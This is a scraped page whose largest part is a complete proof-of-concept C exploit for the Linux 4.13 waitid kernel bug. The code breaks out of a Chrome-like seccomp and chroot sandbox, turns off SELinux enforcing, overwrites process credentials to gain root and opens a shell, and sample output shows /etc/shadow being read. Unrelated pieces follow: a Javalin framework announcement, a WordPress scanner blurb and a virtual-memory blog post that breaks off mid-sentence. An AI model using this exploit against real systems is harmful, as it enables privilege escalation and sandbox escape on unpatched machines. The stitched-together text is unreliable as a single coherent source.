Fi8sVrs

// Proof of concept exploit for waitid bug introduced in Linux Kernel 4.13 // By Chris Salls (twitter.com/chris_salls) // This exploit can be used to break out out of sandboxes such as that in google chrome // In this proof of concept we install the seccomp filter from chrome as well as a chroot, // then break out of those and get root // Bypasses smep and smap, but is somewhat unreliable and may crash the kernel instead // offsets written and tested on ubuntu 17.10-beta2 /* salls@ubuntu:~/x$ uname -a Linux ubuntu 4.13.0-12-generic #13-Ubuntu SMP Sat Sep 23 03:40:16 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux salls@ubuntu:~/x$ gcc poc_smap_bypass.c -lpthread -o poc salls@ubuntu:~/x$ ./poc Installed sandboxes. Seccomp, chroot, uid namespace for spray assuming task struct size is 5952 check in /sys/kernel/slab/task_struct/object_size to make sure this is right If it's wrong the exploit will fail found kernel base 0xffffffff87600000 found mapping at 0xffff8eb500000000 found mapping end at 0xffff8eb5a0000000 9999 threads created found second mapping at 0xffff8eb600000000 found second mapping end at 0xffff8eb750000000 last_mapping is 0x150000000 bytes min guess ffff8eb650000000 starting guessing this part can take up to a minute, or crash the machine :) found my task at 0xffff8eb67555dd00 joining threads part 2 start mapped 0x100000000 trying to find physmap mapping found mapping at 0xffff8eb500000000 f213000 changed to 0 page locked! detected change at 0xffff8eb658000000 physmap addr is good here we go trying to call system... # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare),1000(salls) # head /etc/shadow root:!:17447:0:99999:7::: daemon:*:17435:0:99999:7::: */ /****** overview of exploit ******** waitid uses unsafe_put_user without checking access_ok, allowing the user to give a kernel address for infop and write over kernel memory. when given invalid parameters this just writes the following 32 bit integers 0, 0, 0, _, 0, 0, 0 (the 4th element is unchanged) inside the chrome sandbox we cannot fork (can only make threads) so we can only give invalid parameters to waitid and only write 0's to kernel memory, To exploit this in the presence of smap: I start out by iteratively calling waitid until we find the kernel's base address When it's found it will not return efault error from the syscall Now, I can only write 0's at this point, so I spray 10000 threads and attempt to write 0's over the beginning of the task struct to unset the seccomp flag This part is kind of unreliable and depends on the size of the task struct which changes based on cpu. If it succceeds, I now know where the task struct is and no longer have seccomp By shifting the location of the write and using the pid of the child process, I can now write 5 consecutive arbitrary non-zero bytes. So I can create an address with this bitmask 0xffffffffff000000 Now to create data at such an address I use the physmap, a mirror of all userland pages that exists in kernel memory. Mmap a large amount of memory, try writing at various places in the physmap until we see userland memory change. Then mlock that page. With controlled data in the kernel, I use the 5 byte write described above to change our task->files to point at the controlled page. This give me control of the file operations and arbitrary read/write. From here, I remove the chroot and edit my creds to make that thread root. */ #define _GNU_SOURCE #include <stdlib.h> #include <errno.h> #include <wait.h> #include <string.h> #include <stdio.h> #include <sys/syscall.h> #include <unistd.h> #include <seccomp.h> #include <stdlib.h> #include <sys/prctl.h> #include <sys/types.h> #include <linux/filter.h> #include <fcntl.h> #include <sched.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <stdarg.h> #include <sys/mman.h> #include <sched.h> #include <pthread.h> #include <linux/sched.h> #include <linux/futex.h> #include <limits.h> #include <sys/ioctl.h> #define PR_SET_NO_NEW_PRIVS 38 #define __NR_seccomp 317 #define SECCOMP_SET_MODE_FILTER 1 /************ task offsets *************/ // from prctl_get_seccomp #define OFFSET_OF_SECCOMP_MODE 2920 #define OFFSET_OF_SECCOMP 2928 // from ptrace_access_vm #define OFFSET_OF_PARENT 2328 // from sys_getcwd #define OFFSET_OF_FS 2784 // from __fget_light #define OFFSET_OF_FILES 2792 // from #define OFFSET_OF_NSPROXY 2800 // from do_acct_process #define OFFSET_OF_SIGNAL 2808 // from sys_getuid #define OFFSET_OF_TASK_CRED 2720 // from get_task_comm #define OFFSET_OF_COMM 2728 // from __put_task_struct #define OFFSET_OF_TASK_USAGE 72 // from keyctl_session_to_parent #define OFFSET_OF_THREAD_GROUP 2480 /******* files offsets ********/ // from fput #define OFFSET_OF_F_COUNT 56 // from free_file_rcu #define OFFSET_OF_F_CRED 144 // from file_alloc_security #define OFFSET_OF_F_SECURITY 192 // #define OFFSET_OF_F_INODE 32 /****** inode offsets *********/ #define OFFSET_OF_IFLAGS 12 // should assert nsproxy = files+8 // and fs = files-8 // since that's why we need to fix them up // nsproxy offsets #define OFFSET_OF_NS_COUNT 0 // fs offset #define OFFSET_OF_FS_COUNT 0 // cred offsets #define CRED_UID_OFF 4 #define CRED_ID_SIZE 32 #define CRED_CAP_OFF 40 #define CRED_CAP_SIZE 40 #define CRED_NS_OFF 136 #define OFFSET_OF_CRED_SECURITY 120 #define FMODE_LSEEK 4 // global offsets #define KERNEL_BASE_DEFAULT 0xFFFFFFFF81000000 // in cache_seq_next // mov rax, [rsi]; ret #define ARB_READ_GADGET_OFF (0xffffffff8109d2b2-KERNEL_BASE_DEFAULT) // in device_wakeup_attach_irq // mov [rdx], esi; ret #define ARB_WRITE_GADGET_OFF (0xffffffff810da932-KERNEL_BASE_DEFAULT) #define SELINUX_ENFORCING_OFF (0xffffffff824d1394-KERNEL_BASE_DEFAULT) #define INIT_USER_NS (0xffffffff81e508a0-KERNEL_BASE_DEFAULT) #define INIT_FS (0xffffffff81f23480-KERNEL_BASE_DEFAULT) // operations offsets in qwords #define OFFSET_LSEEK 1 #define OFFSET_IOCTL 9 // 4.13+ // where read/write data is in kernel // had to play with last 3 nibbles to get it to not crash #define start_rw_off 0x9f5fe0 // a global for the f_op in userspace unsigned long *f_op; struct PagePair { unsigned long userland_page; unsigned long kernel_page; }; unsigned long kernel_base; void do_exploit_2(unsigned long task_addr); void get_physmap(struct PagePair *pp); // global for threads #define NUM_THREAD_SPRAY 10000 pthread_t g_threads[NUM_THREAD_SPRAY]; /********** HELPERS *************/ void raw_input() { int i; printf("> "); read(0, (char*)&i, 4); } int write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) { perror("open"); return 0; } if (write(fd, buf, len) != len) { close(fd); return 0; } close(fd); return 1; } static inline void native_cpuid(unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx) { /* ecx is often an input as well as an output. */ asm volatile("cpuid" : "=a" (*eax), "=b" (*ebx), "=c" (*ecx), "=d" (*edx) : "0" (*eax), "2" (*ecx)); } void install_mock_chrome_sandbox() { char *buffer = NULL; long length; FILE *f = fopen ("chrome_seccomp_filter", "rb"); if (f) { fseek(f, 0, SEEK_END); length = ftell (f); fseek(f, 0, SEEK_SET); buffer = malloc(length); if (buffer) { fread(buffer, 1, length, f); } fclose(f); } else { printf("couldn't open chrome_seccomp_filter\n"); exit(-1); } if (length%8 != 0) { printf("length mod 8 != 0?\n"); exit(-1); } // set up namespace int real_uid = 1000; int real_gid = 1000; int has_newuser = 1; if (unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); printf("no new user...\n"); has_newuser = 0; } if (unshare(CLONE_NEWNET) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/setgroups", "deny")) { perror("write_file(/proc/self/set_groups)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/uid_map", "1000 %d 1\n", real_uid)){ perror("write_file(/proc/self/uid_map)"); exit(EXIT_FAILURE); } if (has_newuser && !write_file("/proc/self/gid_map", "1000 %d 1\n", real_gid)) { perror("write_file(/proc/self/gid_map)"); exit(EXIT_FAILURE); } // chroot if (chroot("/proc/self/fdinfo")) { perror("chroot"); exit(EXIT_FAILURE); } // remove .? // how did they remove that dir.. // set uid if (!has_newuser){ if (setgid(1000)) { perror("setgid"); exit(EXIT_FAILURE); } if (setuid(1000)) { perror("setuid"); exit(EXIT_FAILURE); } } // no new privs int res = prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); if (res) { printf("no new privs failed? %d\n", res); } // filter struct sock_fprog prog = { .len = (unsigned short) (length/8), .filter = (void*)buffer, }; // install filter if (syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog)) { perror("seccomp"); exit(-2); } printf("Installed sandboxes. Seccomp, chroot, uid namespace\n"); } // futex wrapper static int futex(void *uaddr, int futex_op, int val, const struct timespec *timeout, int *uaddr2, int val3) { return syscall(SYS_futex, uaddr, futex_op, val, timeout, uaddr, val3); } /***********EXPLOIT CODE************/ pthread_attr_t thread_attr; unsigned long get_base() { // first we try doing our arb write to find the system base address // if syscall is 0 we didn't fault unsigned long start = 0xffffffff00000000; unsigned long inc = 0x0000000000100000; unsigned long guess = start; while (guess != 0) { int res = syscall(SYS_waitid, P_ALL, 0, guess+start_rw_off, WEXITED, NULL); if (errno != 14) { printf("found kernel base 0x%lx\n", guess); kernel_base = guess; return guess; } guess += inc; } printf("failed to find base address..."); return -1; } int threads_run; int barrier2; int barrier1; unsigned long g_addr_guess; unsigned long mapping_begin; unsigned long mapping_end; int found_one = 0; void *thread_guy(void *arg) { // this thread continuously checks if the seccomp filter was removed // if so we can move onto the part 2 of the exploit // we check if the spray worked before and after each barrier while (1) { if (found_one) { syscall(SYS_exit, 0); } // wait on barrier1 int res = futex(&barrier1, FUTEX_WAIT, 0, NULL, NULL, 0); if (found_one) { syscall(SYS_exit, 0); } long curr_addr = g_addr_guess; __atomic_fetch_add(&threads_run, 1, __ATOMIC_SEQ_CST); // check if opening /dev/random does not return the error code from seccomp // it will still fail because of the chroot, but have a different error int fd = open("/dev/random", O_RDONLY); if (errno != 1) { // FOUND printf("found my task at 0x%lx\n", curr_addr); found_one = 1; do_exploit_2(curr_addr); return NULL; } // wait for barrier 2 if (found_one) { syscall(SYS_exit, 0); } futex(&barrier2, FUTEX_WAIT, 0, NULL, NULL, 0); if (found_one) { syscall(SYS_exit, 0); } __atomic_fetch_add(&threads_run, 1, __ATOMIC_SEQ_CST); } } int num_threads = 0; long spray_offset; void unseccomp() { // first we spin up a lot of threads // let's try 10k // and then we try overwriting the TIF_SECCOMP flag in the task struct int i; unsigned long curr_guess = 0xffff800000000000; int j; while(1) { // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { mapping_begin = curr_guess; printf("found mapping at %p\n", (void*)curr_guess); break; } curr_guess += 0x10000000; } // check if mapping extends higher? while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno == 14) { printf("found mapping end at %p\n", (void*)curr_guess); mapping_end = curr_guess; curr_guess -= 0x10000000; break; } } // start threads barrier1 = 0; barrier2 = 0; for (i = 0; i < NUM_THREAD_SPRAY; i++) { num_threads = i; if(pthread_create(&g_threads[i], &thread_attr, thread_guy, NULL)) { printf("pthread create error\n"); printf("%d\n", i); break; } } printf("%d threads created\n", num_threads); /***** find the kernel heap *******/ unsigned long last_mapping_start; unsigned long last_mapping_end; unsigned long second_mapping; unsigned long second_mapping_end; usleep(100000); while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { printf("found second mapping at %p\n", (void*)curr_guess); //mapping_end = curr_guess; second_mapping = curr_guess; last_mapping_start = second_mapping; curr_guess -= 0x10000000; break; } } while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno == 14) { printf("found second mapping end at %p\n", (void*)curr_guess); second_mapping_end = curr_guess; last_mapping_end = second_mapping_end; curr_guess -= 0x10000000; break; } } unsigned long third_mapping = 0; unsigned long third_mapping_end; usleep(100000); while(curr_guess < second_mapping_end+0x100000000) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { printf("found third mapping at %p\n", (void*)curr_guess); third_mapping = curr_guess; last_mapping_start = third_mapping; curr_guess -= 0x10000000; break; } } if (third_mapping) { while(1) { curr_guess += 0x10000000; // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno == 14) { printf("found third mapping end at %p\n", (void*)curr_guess); third_mapping_end = curr_guess; last_mapping_end = third_mapping_end; curr_guess -= 0x10000000; break; } } } /***** done finding the kernel heap *******/ /****** start overwriting from low addresses to high and hope we unset the seccomp flag ******/ // some start guess found by experimenting, could be very wrong on some systems curr_guess = last_mapping_end-0x100000000; printf("last_mapping is 0x%lx bytes\n", last_mapping_end-last_mapping_start); printf("min guess %lx\n", curr_guess); printf("starting guessing\n"); printf("this part can take up to a minute, or crash the machine :)\n"); i = 0; while(!found_one) { curr_guess += 0x800000; unsigned long guess_val = curr_guess + spray_offset; // try writing syscall(SYS_waitid, P_ALL, 0, guess_val-26, WEXITED, NULL); g_addr_guess = guess_val; // let the threads check barrier2 = 0; threads_run = 0; barrier1 = 1; futex(&barrier1, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); while(threads_run < num_threads) { if (found_one) { // one of the threads is free from seccomp // wake from barriers first barrier1=1; barrier2=1; futex(&barrier1, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); futex(&barrier2, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); printf("joining threads\n"); for(i = 0; i < num_threads; i++) { pthread_join(g_threads[i], NULL); } printf("done joining threads\n"); sleep(1000); } usleep(10000); } // make sure threads are reset barrier2 = 1; barrier1 = 0; futex(&barrier2, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); while(threads_run < num_threads*2) { if (found_one) { printf("apparently we found one sleep forever\n"); // wake from barriers first barrier1=1; barrier2=1; futex(&barrier1, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); futex(&barrier2, FUTEX_WAKE, INT_MAX, NULL, NULL, 0); printf("joining threads\n"); for(i = 0; i < num_threads; i++) { pthread_join(g_threads[i], NULL); } printf("done joining threads\n"); sleep(100000); } usleep(10000); } threads_run = 0; barrier2 = 0; i += 1; } } int just_exit(void *arg) { return 0; } int done_overwrite; long new_stack[10000]; void write_5(unsigned long addr, unsigned long val) { // uses waitid with pid to write a 5 byte value // clobbers a lot of adjacent memory, mostly with 0's long fake_info[20]; if(val & 0xffffff) { printf("cannot write that val\n"); exit(-1); } //fork exit until pid is good int i = 0; for(i = 3; i < 8; i++) { int to_write = (val >> (8*i)) & 0xff; while(1) { // get pid ending in to_write //int pid = fork(); // to make super fast we clone VM instead of regular fork // int pid = syscall(SYS_clone, CLONE_VM | CLONE_CHILD_SETTID | CLONE_CHILD_CLEARTID | SIGCHLD, &new_stack[200], NULL, 0, 0); int pid = clone(just_exit, &new_stack[5000], CLONE_VM | SIGCHLD, NULL); if (!pid) { exit(0); } if ((pid & 0xff) == to_write) { syscall(SYS_waitid, P_PID, pid, addr-16+i, WEXITED, NULL); break; } else { syscall(SYS_waitid, P_PID, pid, fake_info, WEXITED, NULL); } } } } // functions for once we control ops unsigned long read_addr(unsigned long addr) { f_op[OFFSET_LSEEK] = ARB_READ_GADGET_OFF + kernel_base; return syscall(SYS_lseek, 0, addr, SEEK_SET); } void mem_read(unsigned long addr, void *buf, unsigned long bytes) { unsigned long i = 0; char *cbuf = (char*)buf; for(i = 0; i < bytes; i+= 8) { unsigned long got = read_addr(addr+i); if (i+8 > bytes) { unsigned long j = 0; for(j = i; j < bytes; j++) { cbuf[j] = (char)got&0xff; got >>= 8; } } else { *(long*)(cbuf+i) = got; } } } void write_addr4(unsigned long addr, unsigned int val) { f_op[OFFSET_IOCTL] = ARB_WRITE_GADGET_OFF+kernel_base; ioctl(0, val, addr); } void write_addr(unsigned long addr, unsigned long val) { write_addr4(addr, (unsigned int)val); write_addr4(addr+4, (unsigned int)(val>>32)); } void mem_write(unsigned long addr, void *buf, unsigned long bytes) { if (bytes < 4 || bytes % 4 != 0) { //cannot write less than 4 bytes printf("Invalid write size\n"); exit(-1); } int i = 0; char *cbuf = buf; for(i = 0; i < bytes; i+=4) { write_addr4(addr+i, *(unsigned int*)(cbuf+i)); } } void *write_5_thread(void *arg) { // constantly write to pages to keep them dirtly and "mlock" them unsigned long *aa = arg; unsigned long addr = aa[0]; unsigned long data = aa[1]; write_5(addr, data); done_overwrite = 1; } int done_rooting; void *thread_to_be_root(void *arg) { // this guy exists for copying data and becoming root while(!done_rooting) { usleep(10000); } printf("trying to call system...\n"); system("/bin/sh"); } void do_exploit_2(unsigned long task_addr) { // second part of the exploit // now that we don't have seccomp we can fork and use waitid to write up to 5 non-NULL bytes // I map a large section of memory and search for it in the physmap to find an address with 3 NULL bytes // The physmap allows us to control data from userland and bypass smap // sleep for a bit to make sure threads exit usleep(100000); // remove seccomp filter syscall(SYS_waitid, P_ALL, 0, task_addr + OFFSET_OF_SECCOMP-4, WEXITED, NULL); syscall(SYS_waitid, P_ALL, 0, task_addr + OFFSET_OF_SECCOMP_MODE, WEXITED, NULL); // verify seccomp removed for child int pid = fork(); int rand_fd = open("/dev/random", O_RDONLY); // this will fail due to chroot if (errno == 1) { printf("SECCOMP NOT ACTUALLY GONE!\n"); exit(-1); } if (!pid) { exit(0); } printf("part 2 start\n"); // First, get a physmap address in the kernel land struct PagePair pp; get_physmap(&pp); // now we have a physmap address that we know, we can create our fake files // we will set up fake files struct memset((void*)pp.userland_page, 0x41, 0x1000); unsigned long files_struct = pp.userland_page; *(int*)files_struct = 100; // count (make sure it's never freed) *(unsigned long*)(files_struct+32) = pp.kernel_page+0x100; // fdt // set up fdt unsigned long fdt = pp.userland_page+0x100; *(int*)fdt = 2; // num_files *(unsigned long*)(fdt+8) = pp.kernel_page+0x200; // fd[] // set up fd[] unsigned long fdarr = pp.userland_page+0x200; *(unsigned long*)fdarr = pp.kernel_page+0x300; // fd[0] // set up file struct unsigned long file = pp.userland_page+0x300; *(unsigned long*)(file+40) = pp.kernel_page+0x400; // f_op *(unsigned int*)(file+68) = FMODE_LSEEK; // mode *(unsigned long*)(file+OFFSET_OF_F_COUNT)=100; // never free me f_op = (unsigned long*)(pp.userland_page+0x400); // f_op pointer // need to set up IS_PRIVATE(inode)) and file->cred = task->cred to pass checks for ioctl // this is the IS_PRIVATE(inode) *(unsigned long*)(file+OFFSET_OF_F_INODE)=pp.kernel_page+0x500; // inode unsigned long inode = (unsigned long)(pp.userland_page+0x500); // inode *(unsigned int*)(inode+OFFSET_OF_IFLAGS) = 0x200; // IS_PRIVATE // write over files pointer in task struct // will overwrite signal nsproxy and fs, so we will need to fix it printf("here we go\n"); done_overwrite=0; long aa[2]; aa[0] = task_addr + OFFSET_OF_FILES; aa[1] = pp.kernel_page; pthread_t th1; // create the thread we will make root done_rooting = 0; if(pthread_create(&th1, NULL, thread_to_be_root, NULL)) { printf("pthread failed\n"); exit(-1); } // create a thread to overwrite the files in our task // this current thread can't do that because the signal will be corrupted if(pthread_create(&th1, NULL, write_5_thread, aa)) { printf("pthread failed\n"); exit(-1); } // wait for the thread to overwrite my files while(!done_overwrite) { } // I'll use lseek here to do arbitrary reads // need to set up IS_PRIVATE(inode)) and file->security = task->cred->security to pass checks for ioctl // first fix up structures in FILE // let's check another file // leak out addr of parent unsigned long parent_addr = read_addr(task_addr+OFFSET_OF_PARENT); // grab security from task cred unsigned long cred = read_addr(task_addr + OFFSET_OF_TASK_CRED); unsigned long security = read_addr(cred + OFFSET_OF_CRED_SECURITY); // fix up file->security *(unsigned long*)(file+OFFSET_OF_F_SECURITY) = security; // now have arb write through ioctl! // okay first fix up task struct // copy parent's nsproxy and set it's refcount high long parent_nsproxy = read_addr(parent_addr+OFFSET_OF_NSPROXY); write_addr(task_addr+OFFSET_OF_NSPROXY, parent_nsproxy); write_addr4(parent_nsproxy+OFFSET_OF_NS_COUNT, 0x11111111); // copy parent's fs and set it's refcount high long parent_fs = read_addr(parent_addr+OFFSET_OF_FS); write_addr(task_addr+OFFSET_OF_FS, parent_fs); write_addr4(parent_fs+OFFSET_OF_FS_COUNT, 0x11111111); // now set tasks refcount high, we don't want to free it ever either? write_addr4(task_addr+OFFSET_OF_TASK_USAGE, 0x11111); // GET ROOT // disable selinux enforcing write_addr4(kernel_base+SELINUX_ENFORCING_OFF, 0); unsigned long thread2 = read_addr(task_addr+OFFSET_OF_THREAD_GROUP)-OFFSET_OF_THREAD_GROUP; if (thread2 == task_addr) { thread2 = read_addr(task_addr+OFFSET_OF_THREAD_GROUP+8)-OFFSET_OF_THREAD_GROUP; } unsigned long signal = read_addr(thread2+OFFSET_OF_SIGNAL); write_addr(task_addr+OFFSET_OF_SIGNAL, signal); // should be able to ptrace now (it's a decent test to make sure signal is fixed // now fix up cred we want root char buf[100]; memset(buf, 0, sizeof(buf)); mem_write(cred+CRED_UID_OFF, buf, CRED_ID_SIZE); memset(buf, 0xff, sizeof(buf)); mem_write(cred+CRED_CAP_OFF, buf, CRED_CAP_SIZE); unsigned long init_ns = INIT_USER_NS+kernel_base; mem_write(cred+CRED_NS_OFF, &init_ns, 8); // is this okay // now we need to just escape the file system sandbox (chroot) unsigned long init_fs = INIT_FS+kernel_base; write_addr(thread2+OFFSET_OF_FS, init_fs); // WE ARE DONE! // signal to the other thread and sleep forever done_rooting = 1; sleep(1000000); } /***** physmap code ******/ int done_locking; char *mapping_base; void *mlock_thread(void *arg) { // constantly write to pages to keep them dirtly and "mlock" them long i; char last_val = 0; while(!done_locking) { last_val += 1; for(i = 0xfff; i < 0x10000000; i+= 0x1000) { mapping_base[i] = last_val; } } } void* mapping_changed() { long i = 0; for(i = 0; i < 0x10000000; i+= 0x1000) { if (mapping_base[i] != 0x41) { printf("%lx changed to %d\n", i, mapping_base[i]); // lock that page in if(mlock(&mapping_base[i], 0x1000)) { perror("mlock"); } printf("page locked!\n"); return &mapping_base[i]; } } return 0; } void get_physmap(struct PagePair *pp) { // mmap a large amount of memory // have one thread watch for changes, while we try overwriting it in the kernel's physmap // lock the page in when it's found unsigned long base = 0x100000000; mapping_base = (char*)base; long* a = mmap((void*)base, 0x10000000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if ((long)a == -1) { printf("mmap failed\n"); perror("mmap"); exit(-1); } printf("mapped %p\n", a); memset(a, 0x41, 0x10000000); done_locking = 0; int j = 0; for(j = 0; j < 4; j++) { pthread_t th1; if(pthread_create(&th1, NULL, mlock_thread, NULL)) { printf("mlock thread create error\n"); exit(0); } } // try to find it in physmap unsigned long curr_guess = mapping_begin-0x80000000; printf("trying to find physmap mapping\n"); while(1) { // try writing int res = syscall(SYS_waitid, P_ALL, 0, curr_guess+0xfe0, WEXITED, NULL); if (errno != 14) { printf("found mapping at %p\n", (void*)curr_guess); curr_guess += 0x80000000; break; } curr_guess += 0x10000000; } // try to find physmap long *locked_mapping = NULL; long *locked_kernel_mapping = NULL; while(1) { // this has 6 0's to ensure that we end up with an address containing only 5 non-zero vals curr_guess += 0x1000000; int res = syscall(SYS_waitid, P_ALL, 0, curr_guess, WEXITED, NULL); if (locked_mapping = mapping_changed()) { locked_kernel_mapping = (long*)curr_guess; printf("detected change at %p\n", (void*)curr_guess); break; } } // verify lock worked locked_mapping[0] = 0x41414141; syscall(SYS_waitid, P_ALL, 0, locked_kernel_mapping, WEXITED, NULL); syscall(SYS_waitid, P_ALL, 0, &locked_kernel_mapping[100], WEXITED, NULL); if (locked_mapping[0] != 0 || locked_mapping[100] != 0) { printf("second write didn't work..."); } printf("physmap addr is good\n"); if(pp) { pp->userland_page = (unsigned long)locked_mapping; pp->kernel_page = (unsigned long)locked_kernel_mapping; } done_locking = 1; } int main() { install_mock_chrome_sandbox(); setvbuf(stdout, NULL, _IONBF, 0); srand(time(NULL)); // set thread size smaller pthread_attr_init(&thread_attr); if(pthread_attr_setstacksize(&thread_attr, 0x10000)) { printf("set stack size error\n"); return 0; } // get cpuid info so we know size of task_struct int eax,ebx,ecx,edx; eax=0xd; ebx = ecx = edx = 0; native_cpuid(&eax, &ebx, &ecx, &edx); int xsave_size = ebx; if(xsave_size == 0x340) { spray_offset = 0x55dd00; printf("for spray assuming task struct size is 5952\n"); } else if(xsave_size == 0x440) { spray_offset = 0x5448c0; printf("for spray assuming task struct size is 6208\n"); } else { printf("unknown xsave size... exiting since I don't know have the offsets hardcoded for that task save\n"); return 0; } printf("check in /sys/kernel/slab/task_struct/object_size to make sure this is right\n"); printf("If it's wrong the exploit will fail\n"); unsigned long base = get_base(); if (base == -1) { return -1; } unseccomp(); return 0; } Download Source: exploit-db.com

Introducing Javalin Javalin is a very lightweight web framework for Kotlin and Java, inspired by Sparkjava and koa.js. Javalin is written in Kotlin with a few functional interfaces written in Java. This was necessary to provide an enjoyable and near identical experience for both Kotlin and Java developers. Java quickstart Add dependency (maven) <dependency> <groupId>io.javalin</groupId> <artifactId>javalin</artifactId> <version>1.0.0</version> </dependency> Start programming import io.javalin.Javalin; public class HelloWorld { public static void main(String[] args) { Javalin app = Javalin.start(7000); app.get("/", ctx -> ctx.result("Hello World")); } } Kotlin quickstart Add dependency (gradle) compile 'io.javalin:javalin:1.0.0' Start programming import io.javalin.Javalin fun main(args: Array<String>) { val app = Javalin.start(7000) app.get("/") { ctx -> ctx.result("Hello World") } } Special thanks: Blake Mizerany, for creating Sinatra Per Wendel, for creating Spark Christian Rasmussen, for being a great guy Per Kristian Kummermo, also for being a great guy Download: javalin-master.zip or git clone https://github.com/tipsy/javalin.git Sources: https://javalin.io/news/javalin-1.0.0-stable.html https://github.com/tipsy/javalin

WPSeku v0.2.1 - Wordpress Security Scanner WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. Installation # git clone https://github.com/m4ll0k/WPSeku.git # cd WPSeku # pip install -r requirements.txt # python wpseku.py Usage: python --target http://youtargethere.com License WPSeku is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 3 of the License. WPSeku is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with WPSeku; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. WPSeku uses WPScan Vulnerability Database API (https://wpvulndb.com/api) Download: WPSeku-master.zip or git clone https://github.com/m4ll0k/WPSeku.git Source: https://github.com/m4ll0k/WPSeku

I’ve been planning for some time to make a post about things you can do with virtual memory, so when @jimsagevid tweeted me about virtual memory in response to my last post, I felt the time was right. Virtual memory is funny. As programmers, we know that it’s there (on all modern CPUs and OSs), but we tend to forget about it, perhaps because it’s not directly exposed in our programming languages. Or, we just think of it as the thing that makes our software run really slow instead of crashing, when it runs out of physical RAM. But, it turns out, if you actually make use of what virtual memory can do, you can achieve some pretty cool things. Obscenely big array To recap — in my last post I faced the problem of wanting a big lookup table from object IDs to object pointers. Furthermore, I wanted this table to stay fixed in memory, so that writers could atomically replace pointers in the table without disturbing readers. This means that using something like a std::vector is not possible, since the underlying data will be reallocated when the vector grows. A fixed array works: object_o *objects[MAX_OBJECTS]. But what size should we use for the array? Pick a big size, and we’re wasting memory. Pick a small size, and we might run out of objects. In the article, I used a hierarchical approach, but as @jimsagevid pointed out, we could use virtual memory instead, and avoid the complexity of a hierarchical table layout. When we allocate memory through the virtual memory system we reserve address space for the pages we allocate immediately (no other code can allocate memory in that address range), but actual physical memory is not allocated until we actually touch the pages. So for this situation, we can just pick a comfortably large number for our array and virtually allocate it. Say 1 billion of objects, for example: #define MAX_OBJECTS 1000000000ULL object_o **objects = virtual_alloc(MAX_OBJECTS * sizeof(object_o *)); We’re using 8 GB of address space and virtual memory, but only as much physical memory as we actually need for our objects. A simple solution that only requires one line of code. Note: I’m using virtual_alloc() here as my OS agnostic virtual memory allocation call. On Windows you would actually call VirtualAlloc() and on Linux mmap(). Another note: Windows separates virtual memory allocation into separate MEM_RESERVE and MEM_COMMIT calls. MEM_RESERVE reserves address space and MEM_COMMIT commits it to physical memory. That does not mean that physical memory is actually allocated when you MEM_COMMIT, the physical memory is still not allocated until you actually touch the pages. But MEM_COMMIT reserves memory in the page file, and if you try to commit more memory than you have in your page file, MEM_COMMIT will fail. So on Windows, you probably don’t want to MEM_COMMIT the entire lookup table (because you only have a limited size page file). Instead you want to MEM_RESERVE the whole table in the beginning and then just MEM_COMMIT the range of the table that you actually use. In contrast, Linux allows overcommitting — i.e., you can commit more memory than the size of your page file. For this reason, Linux doesn’t need separate reserve/commit operations which makes the virtual memory a lot simpler to use. Is reserving 8 GB of virtual memory for the array a problem? Not really. There are two limits that concern us here. The first is address space. In a 64-bit application (which we assume), the address space is 264, a staggeringly large number with room for billions of gigabyte-sized arrays. The second limit is for virtual memory. The OS typically doesn’t let us allocate the whole possible address space as virtual memory. On 64-bit Windows, for example, we can only allocate 256 TB of virtual memory. Still, that’s room for 32 000 arrays of 8 GB each, so as long as we don’t go totally crazy, we’re fine. In fact, you could probably use this technique for all global or semi-global arrays in your application without any problems. Remember the old-school C way of writing games with static arrays for all objects: uint32_t num_tanks; tank_t tanks[MAX_TANKS]; uint32_t num_bullets; bullet_t bullets[MAX_BULLETS]; ... If you write code like this, you can be sure that someone will complain that it’s not “future-proof”, since you have caps on the number of objects. That is kind of ridiculous, but to satisfy the complaint in a simpler and more fun way than using a std::vector you can just get rid of the MAX_* defines and allocate 1 GB of virtual memory for each array: #define GB 1000000000 uint32_t num_tanks; tank_t *tanks = virtual_alloc(GB); uint32_t num_bullets; bullet_t *bullets = virtual_alloc(GB); Application wide unique IDs A lot of game engine systems need unique IDs to identify objects. Usually the code looks something like this: uint64_t 